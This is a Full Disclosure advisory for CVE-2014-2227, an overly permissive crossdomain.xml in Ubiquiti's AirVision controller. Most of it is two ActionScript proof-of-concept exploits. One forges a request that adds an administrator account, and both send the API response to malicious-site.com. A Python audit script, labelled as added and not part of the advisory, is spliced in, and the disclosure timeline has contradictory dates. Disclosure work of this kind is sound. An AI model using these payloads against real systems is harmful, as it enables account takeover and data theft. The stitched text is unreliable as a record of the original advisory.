Message-ID: <CAOzeT81wgm8ZB6MRhOe8c6cVFEO=6xSFaw=S_Cff8VF37ViB2w@mail.gmail.com>
Date: Thu, 24 Jul 2014 00:01:11 -0400
From: Seth Art <sethsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CVE-2014-2227: Ubiquiti Networks - AirVision v2.1.3 - Overly Permissive default crossdomain.xml

-----------
Vendor:
-----------
Ubiquiti Networks (http://www.ubnt.com/)

----------------------------------------------
Affected Products/Versions:
----------------------------------------------
AirVision Controller v2.1.3
Note: Previous versions may be affected

-----------------
Description:
-----------------
Title: Overly Permissive default crossdomain.xml file
CVE: CVE-2014-2227
CWE: http://cwe.mitre.org/data/definitions/264.html
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2227.html
Researcher: Seth Art - @sethsec

------------------------------------------------------------------------------------------------------
POC #1: Using crossdomain.xml to execute CSRF and add an administrator:
------------------------------------------------------------------------------------------------------

// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
// (https://github.com/gursev/flash-xdomain-xploit)
package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;
 import flash.net.URLRequestHeader;

 public class XDomainXploit3 extends Sprite {
  public function XDomainXploit3() {
   // Target URL that receives the forged request (the AirVision user API).
   // The controller's wildcard crossdomain.xml is what lets Flash send this
   // cross-origin POST together with the victim's existing session cookies.
   var readFrom:String = "https://victim:7443/api/2.0/admin";
   var header:URLRequestHeader = new URLRequestHeader("Content-Type", "text/plain; charset=UTF-8");
   var readRequest:URLRequest = new URLRequest(readFrom);
   readRequest.method = URLRequestMethod.POST;
   // JSON body of the user-creation call, with userGroup set to admin
   readRequest.data =
"{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@...il.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";
   readRequest.requestHeaders.push(header);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
    getLoader.load(readRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }

  // Runs once the controller has answered; forwards the response body
  private function eventHandler(event:Event):void {
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php";
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
    sendLoader.load(sendRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }
 }
}

-----------------------------------------------------------------------
POC #2: Using crossdomain.xml to exfiltrate log data:
-----------------------------------------------------------------------

// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
// (https://github.com/gursev/flash-xdomain-xploit)
package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;

 public class XDomainXploit extends Sprite {
  public function XDomainXploit() {
   // Target URL from where the data is to be retrieved. The wildcard
   // crossdomain.xml lets this cross-origin GET carry the victim's cookies,
   // so the response is readable by the Flash object.
   var readFrom:String = "https://victim:7443/api/2.0/admin";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
    getLoader.load(readRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }

  // Runs once the controller has answered; forwards the response body
  private function eventHandler(event:Event):void {
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://www.malicious-site.com/admin";
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
    sendLoader.load(sendRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }
 }
}

-------------
Solution:
-------------
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
The application name changed from AirVision to UniFi Video)
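As an added defensive check (not part of the advisory or of Ubiquiti's code): the script below parses a Flash crossdomain.xml policy and reports the settings that make it overly permissive in the way described above, using a constructed wildcard policy and a constructed restrictive replacement, since the advisory does not reproduce the actual AirVision file.

```python
# Added example: audit a Flash crossdomain.xml for overly permissive settings.
# Both sample policies below are constructed for illustration.
import xml.etree.ElementTree as ET

# Constructed wildcard policy of the kind this advisory describes
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed hardened policy: one named origin, HTTPS only, master policy only
RESTRICTIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="controller.example.internal" secure="true"/>
</cross-domain-policy>"""


def audit_crossdomain(xml_text):
    """Return a list of findings; an empty list means no checked weakness."""
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return ["root element is not <cross-domain-policy>"]
    for elem in root.findall("allow-access-from"):
        domain = elem.get("domain", "")
        # A bare wildcard lets any site make cookie-bearing requests
        # through a Flash object and read the responses.
        if domain == "*":
            findings.append("allow-access-from domain=%r is a wildcard" % domain)
        # secure="false" additionally admits plain-HTTP origins to an HTTPS service
        if elem.get("secure", "true").lower() == "false":
            findings.append("allow-access-from domain=%r has secure=false" % domain)
    for elem in root.findall("allow-http-request-headers-from"):
        if elem.get("domain") == "*" or elem.get("headers") == "*":
            findings.append("allow-http-request-headers-from permits any origin or header")
    return findings


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("restrictive", RESTRICTIVE_POLICY)):
        print(name + ":", audit_crossdomain(policy) or "OK")
```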

-----------------------------
Disclosure Timeline:
-----------------------------

2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product
2014-02-19: Ubiquiti confirms receipt of AirVision report and existence of the vulnerability
2014-02-28: CVE-2014-2227 assigned
2014-03-12: Requested status update
2014-03-27: Requested status update
2014-04-07: Requested status update
2014-04-09: Ubiquiti provides timeline for solution
2014-04-18: UniFi Video 3.0.1 is released
2014-06-13: Set public disclosure date of 2014-07-24
2014-07-24: Public disclosure
